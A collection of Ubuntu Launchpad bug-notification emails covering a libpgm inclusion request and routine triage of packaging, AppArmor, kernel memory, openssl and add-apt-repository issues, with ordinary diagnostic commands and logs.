  [MIR] libpgm as dependency of mailman3

Status in libpgm package in Ubuntu:
  New

Bug description:
  [Availability]
  The package is already universe for quite a while and build/works fine so far.
  It is for example already used for 
https://lists.canonical.com/mailman3/postorius/lists/
  OTOH it is a library that can/could be used for much more than just the 
mailman3 stack.

  It builds on all architectures (arch:any)

  [Security]

  No known CVEs found.
  The protocol had some issues a few years ago and related issues in 
Cisco/Microsoft products, but I found no open issues in the package.
  => https://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=pgm

  [Quality assurance]

  As part of the mailman3 stacks as of now (Disco) this installs fine and works 
fine.
  On itself it is useful to (many) other dependencies and does not need a post 
install configuration on its own.

  The package does not ask debconf questions.

  One known bug in each of Ubuntu and Debian.
  - The Ubuntu bug is outdated and should be ok with 5.2 which we have.
  - The Debian bug is only important for solaris builds
  Upstream has 16 open and 27 closed issues - nothing very severe for our 
intentions.

  The package seems to get updates by Debian as needed.
  But upstream seems to have stopped releasing after 2012.
  => https://github.com/steve-o/openpgm/releases
  After talking with one of the uploaders it became clear that they still work 
on master and fixes can be pulled from there as needed.
  https://github.com/steve-o/openpgm/commits/master

  No exotic HW involved.

  There are some tests in ./openpgm/pgm/test/ and ./openpgm/pgm/*_unittest.c 
but dh_auto_test isn't catching them.
  OTOH I can't even guarantee they would be usable, but TL;DR no build time 
tests run.

  d/watch is set up and ok.

  No Lintian warning except newer Standards/Compat versions and no
  HTTPS links uses or GPG checks - nothing severe.

  The package does not rely on demoted or obsolete packages.
  The Scons build system is a pain, but it seems to work as packaged by Debian so no complaints.
  No new gt2k dependencies
  As mentioned the package itself might be abandoned/orphaned by upstream

  [UI standards]

  It uses i18n from gi18n-lib to provide the infrastructure, but I found no 
translations so far.
  But that is ok as this is a low level library without (a lot) of user visible 
strings - no translations (needed).
  No End-user applications that needs a standard conformant desktop file.

  [Dependencies]

  Some dependencies are not in main, but we drive MIR for all related packages
  that are not in main at the same time.
  Please check the list of bugs from the main Mailman3 MIR in bug 1775427 to 
get an overview.

  [Standards compliance]
  The package meets the FHS and Debian Policy standards.
  The packaging itself is very straight forward and uses dh_* as much as 
possible - the d/rules fits on one screen.

  [Maintenance]

  The Server team will subscribe for the package for maintenance, but in
  general it seems low on updates and currently is a sync from Debian.

  [Background]
  The package description explains the general purpose and context of the 
package well.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/libpgm/+bug/1820203/+subscriptions



[Touch-packages] [Bug 1832421] [NEW] openssl reboot needed message using incorrect path to X server

2019-06-11 Thread Seth Arnold
Public bug reported:

Hello, the openssl library postinst file is using pidof /usr/bin/X, but
that doesn't appear to be the path to the X11 server any more:

debian/libssl1.1.postinst:

# Only issue the reboot notification for servers; we proxy this by
# testing that the X server is not running (LP: #244250)
if ! pidof /usr/bin/X > /dev/null && [ -x /usr/share/update-notifier/notify-reboot-required ]; then
    /usr/share/update-notifier/notify-reboot-required
fi


On my 18.04 LTS laptop:

$ ps auxw | grep Xorg
root  2440  0.5  0.4 495932 78996 tty7 Rsl+ May10 264:45 
/usr/lib/xorg/Xorg :0 vt7 -nolisten tcp -auth /var/l

Thanks

ProblemType: Bug
DistroRelease: Ubuntu 18.04
Package: openssl 1.1.1-1ubuntu2.1~18.04.1
ProcVersionSignature: Ubuntu 4.15.0-50.54-generic 4.15.18
Uname: Linux 4.15.0-50-generic x86_64
NonfreeKernelModules: zfs zunicode zavl icp zcommon znvpair
ApportVersion: 2.20.9-0ubuntu7.6
Architecture: amd64
Date: Tue Jun 11 18:06:51 2019
InstallationDate: Installed on 2012-10-18 (2427 days ago)
InstallationMedia: Ubuntu 12.04.1 LTS "Precise Pangolin" - Release amd64 
(20120823.1)
ProcEnviron:
 TERM=rxvt-unicode-256color
 PATH=(custom, no user)
 XDG_RUNTIME_DIR=
 LANG=en_US.UTF-8
 SHELL=/bin/bash
SourcePackage: openssl
UpgradeStatus: Upgraded to bionic on 2018-05-02 (406 days ago)

** Affects: openssl (Ubuntu)
 Importance: Undecided
 Status: New


** Tags: amd64 apport-bug bionic

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openssl in Ubuntu.
https://bugs.launchpad.net/bugs/1832421

Title:
  openssl reboot needed message using incorrect path to X server

Status in openssl package in Ubuntu:
  New


To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/openssl/+bug/1832421/+subscriptions



[Touch-packages] [Bug 1730908] Re: [ 1549.847151] audit: type=1400 audit(1510129355.497:61): apparmor="DENIED" operation="file_mmap" profile="/usr/bin/evince" name="/usr/lib/x86_64-linux-gnu/libproxy/

2019-06-07 Thread Seth Arnold
Hello Robert, thanks for this; could you please file this bug against
the man-db package, and mention that this needs to be adjusted similar
to https://usn.ubuntu.com/4008-2/  ?

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to apparmor in Ubuntu.
https://bugs.launchpad.net/bugs/1730908

Title:
  [ 1549.847151] audit: type=1400 audit(1510129355.497:61):
  apparmor="DENIED" operation="file_mmap" profile="/usr/bin/evince"
  name="/usr/lib/x86_64-linux-
  gnu/libproxy/0.4.14/modules/network_networkmanager.so" pid=2062
  comm="evince" requested_mask="m" denied_mask="m" fsuid=1000 ouid=0

Status in apparmor package in Ubuntu:
  Expired

Bug description:
  Since I installed Ubuntu 17.10 I cannot print anymore.

  The only thing I see in the logs are many lines like the following:
  [ 1549.847151] audit: type=1400 audit(1510129355.497:61): apparmor="DENIED" 
operation="file_mmap" profile="/usr/bin/evince" 
name="/usr/lib/x86_64-linux-gnu/libproxy/0.4.14/modules/network_networkmanager.so"
 pid=2062 comm="evince" requested_mask="m" denied_mask="m" fsuid=1000 ouid=0

  I'm not sure it is the cause of my problems, but there is at least a
  problem with apparmor's configuration in Ubuntu 17.10

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/1730908/+subscriptions



[Touch-packages] [Bug 1831490] Re: kernel is out of memory and killed during a kernel sys_write operation

2019-06-03 Thread Seth Arnold
Can you run apport-collect 1831490 on this machine to collect additional
logs and data?

Thanks

** Also affects: linux (Ubuntu)
   Importance: Undecided
   Status: New

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to apparmor in Ubuntu.
https://bugs.launchpad.net/bugs/1831490

Title:
  kernel is out of memory and killed during a kernel sys_write operation

Status in apparmor package in Ubuntu:
  New
Status in linux package in Ubuntu:
  New

Bug description:
  This error is being reproduced on i386 arch when using the pc-kernel
  snap from beta or candidate.

  > sudo snap install test-snapd-tools
  > dmesg

  [15131.806107] audit: type=1400 audit(1559585825.240:93): 
apparmor="STATUS" operation="profile_replace" profile="unconfined" 
name="snap-update-ns.test-snapd-tools" pid=18240 comm="apparmor_parser"
  [15131.871610] vmap allocation for size 73728 failed: use vmalloc= to 
increase size.
  [15131.871614] vmalloc: allocation failure: 68481 bytes
  [15131.871616] apparmor_parser: page allocation failure: order:0, 
mode:0x24000c2
  [15131.871619] CPU: 0 PID: 18242 Comm: apparmor_parser Not tainted 
4.4.0-150-generic #176-Ubuntu
  [15131.871620] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 
1.10.2-1ubuntu1 04/01/2014
  [15131.871622]  c1b15967 5ed07e43 0286 cfee9e00 c13c12ef c1a1ce6c 
0001 cfee9e30
  [15131.871625]  c11821b6 c1a1b220 f40ba700  024000c2 cfee9e44 
c1a1ce6c cfee9e18
  [15131.871629]  5ed07e43 00010b81  cfee9e60 c11ba86f 024000c2 
 c1a1ce6c
  [15131.871632] Call Trace:
  [15131.871637]  [] dump_stack+0x58/0x79
  [15131.871640]  [] warn_alloc_failed+0xd6/0x110
  [15131.871643]  [] __vmalloc_node_range+0x1ef/0x210
  [15131.871645]  [] __vmalloc_node+0x66/0x70
  [15131.871648]  [] ? __aa_kvmalloc+0x28/0x60
  [15131.871650]  [] vmalloc+0x38/0x40
  [15131.871652]  [] ? __aa_kvmalloc+0x28/0x60
  [15131.871654]  [] __aa_kvmalloc+0x28/0x60
  [15131.871656]  [] aa_simple_write_to_buffer+0x34/0x90
  [15131.871658]  [] policy_update+0x73/0x230
  [15131.871660]  [] ? security_file_permission+0x3e/0xd0
  [15131.871662]  [] profile_replace+0x98/0xe0
  [15131.871664]  [] ? policy_update+0x230/0x230
  [15131.871666]  [] __vfs_write+0x22/0x50
  [15131.871668]  [] vfs_write+0x8c/0x1b0
  [15131.871669]  [] SyS_write+0x51/0xb0
  [15131.871672]  [] do_fast_syscall_32+0x9f/0x190
  [15131.871675]  [] sysenter_past_esp+0x3d/0x61
  [15131.871676] Mem-Info:
  [15131.871679] active_anon:16802 inactive_anon:2068 isolated_anon:0
  active_file:84472 inactive_file:25195 isolated_file:0
  unevictable:0 dirty:34 writeback:0 unstable:0
  slab_reclaimable:7222 slab_unreclaimable:14030
  mapped:8431 shmem:5785 pagetables:204 bounce:0
  free:289381 free_pcp:659 free_cma:0
  [15131.871685] DMA free:8848kB min:788kB low:984kB high:1180kB 
active_anon:636kB inactive_anon:0kB active_file:2720kB inactive_file:800kB 
unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15992kB 
managed:15916kB mlocked:0kB dirty:0kB writeback:0kB mapped:472kB shmem:308kB 
slab_reclaimable:484kB slab_unreclaimable:424kB kernel_stack:8kB pagetables:4kB 
unstable:0kB bounce:0kB free_pcp:0kB local_pcp:0kB free_cma:0kB 
writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no
  [15131.871686] lowmem_reserve[]: 0 834 1942 1942
  [15131.871692] Normal free:364440kB min:42432kB low:53040kB high:63648kB 
active_anon:30164kB inactive_anon:2776kB active_file:158404kB 
inactive_file:32020kB unevictable:0kB isolated(anon):0kB isolated(file):0kB 
present:897016kB managed:862444kB mlocked:0kB dirty:116kB writeback:0kB 
mapped:11176kB shmem:6332kB slab_reclaimable:28404kB slab_unreclaimable:55696kB 
kernel_stack:1040kB pagetables:348kB unstable:0kB bounce:0kB free_pcp:1336kB 
local_pcp:676kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 
all_unreclaimable? no
  [15131.871693] lowmem_reserve[]: 0 0 8863 8863
  [15131.871698] HighMem free:784236kB min:512kB low:14600kB high:28688kB 
active_anon:36408kB inactive_anon:5496kB active_file:176764kB 
inactive_file:67960kB unevictable:0kB isolated(anon):0kB isolated(file):0kB 
present:1134472kB managed:1134472kB mlocked:0kB dirty:20kB writeback:0kB 
mapped:22076kB shmem:16500kB slab_reclaimable:0kB slab_unreclaimable:0kB 
kernel_stack:0kB pagetables:464kB unstable:0kB bounce:0kB free_pcp:1300kB 
local_pcp:680kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 
all_unreclaimable? no
  [15131.871699] lowmem_reserve[]: 0 0 0 0
  [15131.871701] DMA: 12*4kB (UME) 10*8kB (UME) 7*16kB (ME) 5*32kB (UM) 2*64kB 
(U) 3*128kB (UM) 3*256kB (UM) 4*512kB (UME) 3*1024kB (ME) 1*2048kB (M) 0*4096kB 
= 8848kB
  [15131.871711] Normal: 87*4kB (UME) 106*8kB (UME) 168*16kB (UME) 195*32kB 
(UME) 135*64kB (UME) 161*128kB (ME) 120*256kB (ME) 61*512kB (UME) 25*1024kB 
(ME) 6*2048kB (M) 55*4096kB (M) = 364492kB
  [15131.871720] HighMem: 131*4kB 

[Touch-packages] [Bug 1831301] Re: sound doesn't works in both kernel. no one cards is recognize by system-

2019-05-31 Thread Seth Arnold
** Package changed: alsa-driver (Ubuntu) => linux (Ubuntu)

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to alsa-driver in Ubuntu.
https://bugs.launchpad.net/bugs/1831301

Title:
  sound doesn't works in both kernel. no one cards is recognize by
  system-

Status in linux package in Ubuntu:
  New

Bug description:
  .

  ProblemType: Bug
  DistroRelease: Ubuntu 18.04
  Package: alsa-base (not installed)
  ProcVersionSignature: Ubuntu 5.0.0-15.16~18.04.1-generic 5.0.6
  Uname: Linux 5.0.0-15-generic x86_64
  ApportVersion: 2.20.9-0ubuntu7.6
  Architecture: amd64
  Date: Sat Jun  1 04:26:10 2019
  InstallationDate: Installed on 2019-04-03 (58 days ago)
  InstallationMedia: Ubuntu 18.04.2 LTS "Bionic Beaver" - Release amd64 
(20190210)
  ProcEnviron:
   TERM=xterm-256color
   PATH=(custom, no user)
   LANG=it_IT.UTF-8
   SHELL=/bin/bash
  SourcePackage: alsa-driver
  UpgradeStatus: No upgrade log present (probably fresh install)
  mtime.conffile..etc.modprobe.d.alsa-base.conf: 2019-05-31T22:19:11.232515

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1831301/+subscriptions



[Touch-packages] [Bug 1713435] Re: package openssh-server 1:7.2p2-4ubuntu2.2 failed to install/upgrade: subprocess installed post-installation script returned error exit status 1

2019-05-24 Thread Seth Arnold
Hi Michael, thanks for reporting back the solution -- we're fine here,
nothing needs doing.

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openssh in Ubuntu.
https://bugs.launchpad.net/bugs/1713435

Title:
  package openssh-server 1:7.2p2-4ubuntu2.2 failed to install/upgrade:
  subprocess installed post-installation script returned error exit
  status 1

Status in openssh package in Ubuntu:
  Expired

Bug description:
  invoke-rc.d: initscript ssh, action "start" failed.
  ● ssh.service - OpenBSD Secure Shell server
 Loaded: loaded (/lib/systemd/system/ssh.service; enabled; vendor preset: 
enabled)
 Active: failed (Result: exit-code) since Mon 2017-08-28 14:36:40 IST; 9ms 
ago
Process: 21687 ExecStart=/usr/sbin/sshd -D $SSHD_OPTS (code=exited, 
status=255)
   Main PID: 21687 (code=exited, status=255)

  Aug 28 14:36:40 LinuxMachine systemd[1]: Starting OpenBSD Secure Shell 
server...
  Aug 28 14:36:40 LinuxMachine systemd[1]: ssh.service: Main process exited, 
c...a
  Aug 28 14:36:40 LinuxMachine systemd[1]: Failed to start OpenBSD Secure 
Shel
  Aug 28 14:36:40 LinuxMachine systemd[1]: ssh.service: Unit entered failed 
state.
  Aug 28 14:36:40 LinuxMachine systemd[1]: ssh.service: Failed with result 
'ex

  ProblemType: Package
  DistroRelease: Ubuntu 16.04
  Package: openssh-server 1:7.2p2-4ubuntu2.2
  ProcVersionSignature: Ubuntu 4.4.0-92.115-generic 4.4.76
  Uname: Linux 4.4.0-92-generic x86_64
  ApportVersion: 2.20.1-0ubuntu2.10
  Architecture: amd64
  Date: Mon Aug 28 14:36:40 2017
  ErrorMessage: subprocess installed post-installation script returned error 
exit status 1
  InstallationDate: Installed on 2016-12-12 (258 days ago)
  InstallationMedia: Ubuntu-GNOME 16.04.1 LTS "Xenial Xerus" - Release amd64 
(20160720)
  RelatedPackageVersions:
   dpkg 1.18.4ubuntu1.2
   apt  1.2.24
  SourcePackage: openssh
  Title: package openssh-server 1:7.2p2-4ubuntu2.2 failed to install/upgrade: 
subprocess installed post-installation script returned error exit status 1
  UpgradeStatus: No upgrade log present (probably fresh install)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/openssh/+bug/1713435/+subscriptions



[Touch-packages] [Bug 1829588] Re: make it easy to add proposed; help text outdated

2019-05-24 Thread Seth Arnold
** Description changed:

- I want to do some SRU testing but I have to look up how to add the
- -proposed lines to apt sources every time I want to do this task. The
- wiki page for it is pretty verbose and includes text like: "Replace
- "xenial" with "trusty", "vivid", "utopic", "precise", or "lucid"
- depending on which release you are on. "
- 
  Adding -proposed should be as easy as running:
  
  sudo add-apt-repository proposed
  
  But this doesn't work:
  $ sudo add-apt-repository proposed
  Error: 'proposed' invalid
  
- The help text includes a bunch of examples of things that users almost
- never need to do any more:
+ It'd be nice if add-apt-repository could work for all of:
  
- $ add-apt-repository -h
- [...]
-   Examples:
- apt-add-repository 'deb http://myserver/path/to/repo stable myrepo'
- apt-add-repository 'http://myserver/path/to/repo myrepo'
- apt-add-repository 'https://packages.medibuntu.org free non-free'
- apt-add-repository http://extras.ubuntu.com/ubuntu
- apt-add-repository ppa:user/repository
- apt-add-repository ppa:user/distro/repository
- apt-add-repository multiverse
+ - adding main
+ - adding restricted
+ - adding universe
+ - adding multiverse
+ - adding partners
  
- 
- https://packages.medibuntu.org is now owned by a commerce site, or squatter, 
or something similar. It also fails certificate validation. This should be 
removed.
- 
- http://extras.ubuntu.com/ubuntu/dists/ has precise through utopic. Maybe
- we shouldn't remove this yet, but someday we may want to revisit this
- one.
- 
- It'd be great to have examples of adding proposed, universe, security,
- updates, etc.
- 
- Maybe it'd be nice to put a reference to whatever tool would also enable
- ESM.
+ - adding proposed
+ - adding security
+ - adding universe
  
  Thanks
- 
- ProblemType: Bug
- DistroRelease: Ubuntu 18.04
- Package: software-properties-common 0.96.24.32.7
- ProcVersionSignature: Ubuntu 4.15.0-50.54-generic 4.15.18
- Uname: Linux 4.15.0-50-generic x86_64
- NonfreeKernelModules: zfs zunicode zavl icp zcommon znvpair
- ApportVersion: 2.20.9-0ubuntu7.6
- Architecture: amd64
- Date: Fri May 17 18:32:49 2019
- InstallationDate: Installed on 2012-10-18 (2402 days ago)
- InstallationMedia: Ubuntu 12.04.1 LTS "Precise Pangolin" - Release amd64 
(20120823.1)
- PackageArchitecture: all
- ProcEnviron:
-  TERM=rxvt-unicode-256color
-  PATH=(custom, no user)
-  XDG_RUNTIME_DIR=
-  LANG=en_US.UTF-8
-  SHELL=/bin/bash
- SourcePackage: software-properties
- UpgradeStatus: Upgraded to bionic on 2018-05-02 (381 days ago)

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to software-properties in
Ubuntu.
https://bugs.launchpad.net/bugs/1829588

Title:
  make it easy to add proposed; help text outdated

Status in software-properties package in Ubuntu:
  Confirmed

Bug description:
  Adding -proposed should be as easy as running:

  sudo add-apt-repository proposed

  But this doesn't work:
  $ sudo add-apt-repository proposed
  Error: 'proposed' invalid

  It'd be nice if add-apt-repository could work for all of:

  - adding main
  - adding restricted
  - adding universe
  - adding multiverse
  - adding partners

  - adding proposed
  - adding security
  - adding universe

  Thanks

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/software-properties/+bug/1829588/+subscriptions



[Touch-packages] [Bug 1829588] Re: make it easy to add proposed; help text outdated

2019-05-24 Thread Seth Arnold
The wiki page does have the software properties method documented:
https://wiki.ubuntu.com/Testing/EnableProposed

I don't have software-properties-gtk installed (and until now didn't
know the name of the command to launch it), so apt-add-repository was my
first attempt.

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to software-properties in
Ubuntu.
https://bugs.launchpad.net/bugs/1829588

Title:
  make it easy to add proposed; help text outdated

Status in software-properties package in Ubuntu:
  Confirmed

Bug description:
  Adding -proposed should be as easy as running:

  sudo add-apt-repository proposed

  But this doesn't work:
  $ sudo add-apt-repository proposed
  Error: 'proposed' invalid

  It'd be nice if add-apt-repository could work for all of:

  - adding main
  - adding restricted
  - adding universe
  - adding multiverse
  - adding partners

  - adding proposed
  - adding security
  - adding universe

  Thanks

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/software-properties/+bug/1829588/+subscriptions



[Touch-packages] [Bug 1458014] Re: audit_printk_skb slowing down boot

2019-05-24 Thread Seth Arnold
pito, it'd probably be best to head to https://askubuntu.com/ or #ubuntu
on irc.freenode.net to try to figure out where exactly your slow
performance is coming from.

Install the systemd-bootchart package, then at grub's kernel command
line, add init=/lib/systemd/systemd-bootchart

Attach the stripchart to the bug report.

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to apparmor in Ubuntu.
https://bugs.launchpad.net/bugs/1458014

Title:
  audit_printk_skb slowing down boot

Status in apparmor package in Ubuntu:
  Confirmed

Bug description:
  Subjectively, my system slowed down after the recent GRUB update.

  As you can see from the following, audit_printk_skb is consuming a lot
  of boot time:

  [   13.243280] vboxdrv: Successfully loaded version 4.3.10_Ubuntu (interface 0x001a0007).
  [   13.257947] vboxpci: IOMMU not found (not registered)
  [   13.862999] IPv6: ADDRCONF(NETDEV_UP): wlan0: link is not ready
  [   13.865996] IPv6: ADDRCONF(NETDEV_UP): wlan0: link is not ready
  [   14.195776] r8169 :04:00.0 eth0: link down
  [   14.195796] r8169 :04:00.0 eth0: link down
  [   14.195827] IPv6: ADDRCONF(NETDEV_UP): eth0: link is not ready
  [   14.196138] IPv6: ADDRCONF(NETDEV_UP): eth0: link is not ready
  [   15.769090] r8169 :04:00.0 eth0: link up
  [   15.769097] IPv6: ADDRCONF(NETDEV_CHANGE): eth0: link becomes ready
  [   16.223084] init: plymouth-upstart-bridge main process ended, respawning
  [   42.424836] audit_printk_skb: 195 callbacks suppressed
  [   42.424839] type=1400 audit(1431891089.974:77): apparmor="STATUS" operation="profile_replace" profile="unconfined" name="/usr/lib/cups/backend/cups-pdf" pid=2632 comm="apparmor_parser"
  [   42.424844] type=1400 audit(1431891089.974:78): apparmor="STATUS" operation="profile_replace" profile="unconfined" name="/usr/sbin/cupsd" pid=2632 comm="apparmor_parser"
  [   42.425185] type=1400 audit(1431891089.974:79): apparmor="STATUS" operation="profile_replace" profile="unconfined" name="/usr/sbin/cupsd" pid=2632 comm="apparmor_parser"
  (END)

  ProblemType: Bug
  DistroRelease: Ubuntu 14.04
  Package: apparmor 2.8.95~2430-0ubuntu5.1
  ProcVersionSignature: Ubuntu 3.13.0-53.88-generic 3.13.11-ckt19
  Uname: Linux 3.13.0-53-generic i686
  ApportVersion: 2.14.1-0ubuntu3.10
  Architecture: i386
  CurrentDesktop: Unity
  Date: Fri May 22 14:18:46 2015
  EcryptfsInUse: Yes
  InstallationDate: Installed on 2014-04-29 (388 days ago)
  InstallationMedia: Ubuntu 14.04 LTS "Trusty Tahr" - Release i386 (20140417)
  ProcKernelCmdline: BOOT_IMAGE=/boot/vmlinuz-3.13.0-53-generic root=UUID=8cf458ab-4ff9-4505-9a16-27da1ea7ec10 ro quiet splash vt.handoff=7
  SourcePackage: apparmor
  Syslog:
   
  UpgradeStatus: No upgrade log present (probably fresh install)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/1458014/+subscriptions



[Touch-packages] [Bug 1829857] Re: package python-django 1.6.11-0ubuntu1.2 failed to install/upgrade: subprocess new pre-removal script returned error exit status 1

2019-05-21 Thread Seth Arnold
Hello, can you please provide the output of:

head -1 /usr/bin/pyclean
ls -l /usr/bin/python

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to python-defaults in Ubuntu.
https://bugs.launchpad.net/bugs/1829857

Title:
  package python-django 1.6.11-0ubuntu1.2 failed to install/upgrade:
  subprocess new pre-removal script returned error exit status 1

Status in python-defaults package in Ubuntu:
  Incomplete
Status in python-django package in Ubuntu:
  New

Bug description:
  The installation or removal of a software package failed.

  ProblemType: Package
  DistroRelease: Ubuntu 14.04
  Package: python-django 1.6.11-0ubuntu1.3
  ProcVersionSignature: Ubuntu 4.4.0-142.168~14.04.1-generic 4.4.167
  Uname: Linux 4.4.0-142-generic x86_64
  ApportVersion: 2.14.1-0ubuntu3.29
  Architecture: amd64
  Date: Tue May 21 17:26:39 2019
  DuplicateSignature: package:python-django:1.6.11-0ubuntu1.2:subprocess new pre-removal script returned error exit status 1
  ErrorMessage: subprocess new pre-removal script returned error exit status 1
  InstallationDate: Installed on 2016-08-11 (1012 days ago)
  InstallationMedia: Ubuntu 14.04.4 LTS "Trusty Tahr" - Release amd64 (20160217.1)
  PackageArchitecture: all
  RelatedPackageVersions:
   dpkg 1.17.5ubuntu5.8
   apt  1.0.1ubuntu2.19
  SourcePackage: python-django
  Title: package python-django 1.6.11-0ubuntu1.2 failed to install/upgrade: subprocess new pre-removal script returned error exit status 1
  UpgradeStatus: No upgrade log present (probably fresh install)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/python-defaults/+bug/1829857/+subscriptions



[Touch-packages] [Bug 1829885] Re: Exception during pm.DoInstall(): E:Sub-process /usr/bin/dpkg returned an error code (1)

2019-05-21 Thread Seth Arnold
Probably this represents an LVM2 or hardware error instead of something
specific to certificates.

Thanks

** Package changed: ca-certificates (Ubuntu) => ubuntu

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to ca-certificates in Ubuntu.
https://bugs.launchpad.net/bugs/1829885

Title:
  Exception during pm.DoInstall():  E:Sub-process /usr/bin/dpkg returned
  an error code (1)

Status in Ubuntu:
  New

Bug description:
  Encountered during a do-release-upgrade from 16.04.6 LTS to 18.04.2
  LTS.

  Processing triggers for resolvconf (1.79ubuntu10.18.04.3) ...
  Errors were encountered while processing:
   ca-certificates
   ubuntu-release-upgrader-core
   update-manager-core
   update-notifier-common
   snapd
   ubuntu-core-launcher
   software-properties-common
   python3-httplib2
   python3-certifi
   python3-requests
   python3-requests-unixsocket
   python3-apport
   apport
   landscape-common
   ubuntu-server
   ssh-import-id
  Exception during pm.DoInstall():  E:Sub-process /usr/bin/dpkg returned an error code (1)

  ProblemType: Package
  DistroRelease: Ubuntu 18.04
  Package: ca-certificates 20180409
  ProcVersionSignature: Ubuntu 4.4.0-145.171-generic 4.4.176
  Uname: Linux 4.4.0-145-generic x86_64
  ApportVersion: 2.20.9-0ubuntu7.6
  Architecture: amd64
  Date: Tue May 21 16:11:17 2019
  ErrorMessage: installed ca-certificates package post-installation script subprocess returned error exit status 23
  InstallationDate: Installed on 2017-01-30 (840 days ago)
  InstallationMedia: Ubuntu-Server 16.04.1 LTS "Xenial Xerus" - Release amd64 (20160719)
  PackageArchitecture: all
  Python3Details: /usr/bin/python3.6, Python 3.6.7, python3-minimal, 3.6.7-1~18.04
  PythonDetails: N/A
  RelatedPackageVersions:
   dpkg 1.19.0.5ubuntu2.1
   apt  1.6.10
  SourcePackage: ca-certificates
  Title: package ca-certificates 20180409 failed to install/upgrade: installed ca-certificates package post-installation script subprocess returned error exit status 23
  UpgradeStatus: Upgraded to bionic on 2019-05-21 (0 days ago)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+bug/1829885/+subscriptions



[Touch-packages] [Bug 1829857] Re: package python-django 1.6.11-0ubuntu1.2 failed to install/upgrade: subprocess new pre-removal script returned error exit status 1

2019-05-21 Thread Seth Arnold
The error message from the terminal log:

(Reading database ... 1522438 files and directories currently installed.)
Preparing to unpack .../python-django_1.6.11-0ubuntu1.3_all.deb ...
  File "/usr/bin/pyclean", line 63
except (IOError, OSError), e:
 ^
SyntaxError: invalid syntax
dpkg: warning: subprocess old pre-removal script returned error exit status 1
dpkg: trying script from the new package instead ...
  File "/usr/bin/pyclean", line 63
except (IOError, OSError), e:
 ^
SyntaxError: invalid syntax
dpkg: error processing archive /var/cache/apt/archives/python-django_1.6.11-0ubuntu1.3_all.deb (--unpack):
 subprocess new pre-removal script returned error exit status 1

** Also affects: python-defaults (Ubuntu)
   Importance: Undecided
   Status: New

** Changed in: python-django (Ubuntu)
 Assignee: Dhirendra (dhiru-research) => (unassigned)

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to python-defaults in Ubuntu.
https://bugs.launchpad.net/bugs/1829857

Title:
  package python-django 1.6.11-0ubuntu1.2 failed to install/upgrade:
  subprocess new pre-removal script returned error exit status 1

Status in python-defaults package in Ubuntu:
  New
Status in python-django package in Ubuntu:
  New


To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/python-defaults/+bug/1829857/+subscriptions



[Touch-packages] [Bug 1829650] Re: OpenGl

2019-05-20 Thread Seth Arnold
Thanks for taking the time to report this bug and helping to make Ubuntu
better. We appreciate the difficulties you are facing, but this appears
to be a "regular" (non-security) bug.  I have unmarked it as a security
issue since this bug does not show evidence of allowing attackers to
cross privilege boundaries nor directly cause loss of data/privacy.
Please feel free to report any other bugs you may find.

** Information type changed from Private Security to Public

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to xorg in Ubuntu.
https://bugs.launchpad.net/bugs/1829650

Title:
  OpenGl

Status in xorg package in Ubuntu:
  New

Bug description:
  So I was messing around in the Libre Office settings and enabled Open
  GL (hoping for GL acceleration). Once I restarted Libre Office, it
  would load, but a window would appear briefly and close.

  ProblemType: Bug
  DistroRelease: Ubuntu 18.04
  Package: xorg 1:7.7+19ubuntu7.1
  ProcVersionSignature: Ubuntu 4.15.0-51.55-generic 4.15.18
  Uname: Linux 4.15.0-51-generic x86_64
  .tmp.unity_support_test.0:
   
  ApportVersion: 2.20.9-0ubuntu7.6
  Architecture: amd64
  CompizPlugins: No value set for `/apps/compiz-1/general/screen0/options/active_plugins'
  CompositorRunning: None
  Date: Sun May 19 12:40:25 2019
  DistUpgraded: Fresh install
  DistroCodename: bionic
  DistroVariant: ubuntu
  GraphicsCard:
   Intel Corporation 3rd Gen Core processor Graphics Controller [8086:0166] (rev 09) (prog-if 00 [VGA controller])
     Subsystem: Lenovo 3rd Gen Core processor Graphics Controller [17aa:21f3]
  MachineType: LENOVO 2349IP5
  ProcKernelCmdLine: BOOT_IMAGE=/boot/vmlinuz-4.15.0-51-generic root=UUID=66ca1202-c6da-48c1-be0e-f4b431fb8924 ro quiet splash vt.handoff=1
  Renderer: Software
  SourcePackage: xorg
  UpgradeStatus: No upgrade log present (probably fresh install)
  dmi.bios.date: 01/09/2013
  dmi.bios.vendor: LENOVO
  dmi.bios.version: G1ET91WW (2.51 )
  dmi.board.asset.tag: Not Available
  dmi.board.name: 2349IP5
  dmi.board.vendor: LENOVO
  dmi.board.version: Win8 Pro DPK TPG
  dmi.chassis.asset.tag: No Asset Information
  dmi.chassis.type: 10
  dmi.chassis.vendor: LENOVO
  dmi.chassis.version: Not Available
